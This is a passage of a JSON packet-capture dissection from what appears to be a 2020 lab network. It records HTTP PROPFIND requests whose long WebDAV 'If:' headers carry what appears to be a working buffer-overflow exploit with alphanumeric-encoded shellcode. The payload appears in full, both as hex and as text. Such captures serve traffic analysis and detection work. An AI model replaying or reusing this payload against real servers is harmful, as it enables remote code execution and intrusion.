"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00005415",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:b3:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:b3:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868723",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.001491000",
|
||
"tcp.analysis.bytes_in_flight": "1635",
|
||
"tcp.analysis.push_bytes_sent": "1635"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.001888000",
|
||
"tcp.time_delta": "0.000009000"
|
||
},
|
||
"tcp.payload": "6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "615",
|
||
"tcp.segment": "616",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1635",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:79:6c:6b:6a:74:4d:56:71:57:44:77:55:48:58:56:6a:71:7a:69:49:42:58:45:6c:4c:73:48:50:6a:69:45:4e:6e:4b:61:6c:76:51:4a:72:63:42:75:56:62:54:7a:77:42:48:55:4f:57:68:76:70:5a:46:64:45:61:6b:e4:a5:b7:e5:81:b4:e4:91:ba:e4:95:b7:e4:9d:9a:e7:a1:93:e6:b9:91:e4:a9:a2:e7:85:89:e5:9d:93:e4:95:82:e4:bd:93:e4:bd:b6:e7:81:91:e4:b5:a3:e5:89:a3:c8:82:c8:82:e1:8b:80:e6:a0:83:e6:95:99:e6:99:a1:e6:9d:ae:e4:8d:a7:e6:91:87:e5:85:85:e7:91:89:e7:8d:aa:e4:8d:99:e7:95:b8:e4:a1:b5:e4:b1:87:e6:b5:84:e6:b5:87:e5:91:a8:e6:85:b2:e4:b5:b7:e4:91:ae:e6:91:b3:e6:89:84:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:65:50:66:51:4e:4d:44:6b:77:5a:43:6c:55:52:6d:76:63:4f:6b:66:44:54:62:5a:6d:73:48:72:49:49:45:53:6c:77:48:47:65:72:74:50:56:6e:55:59:56:5a:52:49:6a:58:66:4e:4c:5a:71:4b:64:42:71:77:4c:4d:e4:a5:b3:e5:9d:a6:e6:a1:97:e4:a5:af:e4:9d:82:e7:9d:90:e7:95:a5:e4:b9:a9:e4:85:94:e7:89:b0:e7:91:b0:e6:99:94:e5:95:82:e5:85:8e:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e6:ad:a5:e7:89:88:e5:91:92:e7:81:9a:e1:8f:80:e6:a0:83:e5:81:8c:e4:95:a5:e4:99:a7:e5:81:97:e6:b1:a5:e5:89:b9:e4:a5:a1:e6:a5:8a:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/ylkjtMVqWDwUHXVjqziIBXElLsHPjiENnKalvQJrcBuVbTzwBHUOWhvpZFdEak<61><6B><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/ePfQNMDkwZClURmvcOkfDTbZmsHrIIESlwHGertPVnUYVZRIjXfNLZqKdBqwLM<4C><4D><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "618"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.921458000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.921458000",
|
||
"frame.time_delta": "0.000009000",
|
||
"frame.time_delta_displayed": "0.006155000",
|
||
"frame.time_relative": "17.172398000",
|
||
"frame.number": "627",
|
||
"frame.len": "251",
|
||
"frame.cap_len": "251",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "237",
|
||
"ip.id": "0x00009427",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00009c7c",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "33891",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "33891",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "85",
|
||
"tcp.len": "185",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "2051919369",
|
||
"tcp.nxtseq": "1634",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "2012780162",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x000088aa",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:b9:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:b9:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868729",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000294000",
|
||
"tcp.analysis.bytes_in_flight": "1633",
|
||
"tcp.analysis.push_bytes_sent": "1633"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000808000",
|
||
"tcp.time_delta": "0.000009000"
|
||
},
|
||
"tcp.payload": "4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "626",
|
||
"tcp.segment": "627",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1633",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:65:62:52:65:4a:4c:57:58:46:48:4a:6a:44:51:75:56:57:43:66:6a:53:6f:41:6a:53:59:53:70:56:67:72:64:79:75:65:46:4f:55:62:78:6f:77:77:68:4f:69:68:43:6a:62:61:41:51:78:4d:6a:7a:69:50:54:6d:e6:99:88:e4:8d:a2:e6:9d:af:e7:95:8b:e4:85:85:e4:bd:a8:e6:b5:a8:e4:85:ba:e4:ad:87:e6:89:96:e4:89:ae:e6:9d:98:e4:ad:8d:e5:a5:b6:e4:b5:84:e5:95:87:c8:82:c8:82:e1:8b:80:e6:a0:83:e5:99:a3:e6:b1:8b:e7:a5:aa:e7:99:ae:e6:b9:b4:e4:a5:ba:e5:8d:97:e5:9d:99:e6:b5:b1:e7:9d:a9:e5:81:b9:e6:91:a3:e6:a9:98:e6:99:b8:e7:9d:8f:e5:99:ab:e5:91:ac:e7:85:8a:e5:a9:b8:e6:91:b8:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:46:52:6e:69:46:6b:6e:79:62:45:7a:54:6e:67:47:61:53:63:44:71:43:66:6d:47:45:54:6a:69:54:70:44:68:59:53:61:4e:42:71:45:69:79:4c:45:4f:4a:6d:4e:6b:4f:65:57:43:70:69:6f:5a:78:65:54:6a:4b:e4:89:b8:e5:95:89:e6:85:84:e5:85:b6:e7:a5:98:e7:9d:b9:e4:95:90:e6:ad:b0:e6:99:b7:e6:85:98:e6:a5:87:e7:a5:b9:e5:8d:94:e7:91:a7:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e7:89:8f:e5:a5:b6:e4:85:aa:e6:b5:81:e1:8f:80:e6:a0:83:e6:a1:87:e7:99:84:e4:99:96:e7:a9:a9:e6:91:a9:e7:99:87:e7:91:95:e5:95:99:e6:82: